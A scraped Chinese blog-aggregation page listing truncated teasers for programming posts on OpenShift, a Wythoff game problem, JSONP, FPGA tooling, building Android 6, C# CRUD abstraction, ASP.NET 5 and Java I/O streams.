    一步一脚印 停停走走,回头看看 博客园 首页 新随笔 联系 订阅 管理 随笔 - 24  文章 - 8  评论 - 2 调戏OpenShift:一个免费能干的云平台   一.前因后果 以前为了搞微信的 ...

  4. poj1067-取石子游戏-wythoff博弈

    打表找规律失败,搜了一下原来是wythoff博弈 /*------------------------------------------------------------------------- ...

  5. 深入浅出jsonp

    前言 第一次听说jsonp,其实早在2年之前.当时在做一个活动页面的抽奖模块,要从服务端get一个概率,当时什么都不懂,同事说用ajax,我就用ajax,同事说dataType改成jsonp,我就改成 ...

  6. SDAccel-FPGA将带来至多25倍单位功耗性能提升

    很久没有看FPGA了,本来想继续学习HLS,就上Xilinx的网站看了看.结果发现了SDx 开发环境,很新的一个东西.由于我对这方面了解不多,本篇博文仅仅只是资料的整合和介绍. 1.SDx开发环境 X ...

  7. 在Ubuntu-14.04.3配置并成功编译Android6_r1源码

    折腾了一周,终于把Android6_r1的源码编译成功.先上图,这是在ubuntu中运行的Android模拟器: 由于我是在win8中安装虚拟机VMware,然后在虚拟机中安装Ubuntu进行编译,所 ...

  8. 让C#开发更简单,抽象增删改

    相信经常做一些MS,CRM 项目的童鞋非常有体会,大部分时间都是在复制和粘贴,大部分项目框架都是建一个三层,首先是DAL建一些增删改查,然后呢是BLL业务层再建一些增删改查,然后UI层再调用增删改查, ...

  9. 初探Asp.net5

    说到Asp.net 5,确实让我有种激动的心情,微软的全力大招在一波一波的发出,也在牵动着每一个程序员的心.作为你们中的一员,在每次看到微软的新技术时,都满怀一种激动的心情,也同时希望微软在开源和跨平 ...

  10. 初探JAVA中I/O流(一)

    一.流 流,这里是对数据交换的形象称法.进程是运行在内存中的,在运行的过程中避免不了会与外界进行数据交互.比如将数据从硬盘.控制台.管道甚至是套接字(具体点应该是我们电脑上的网卡)读到我们进程锁所占据 ...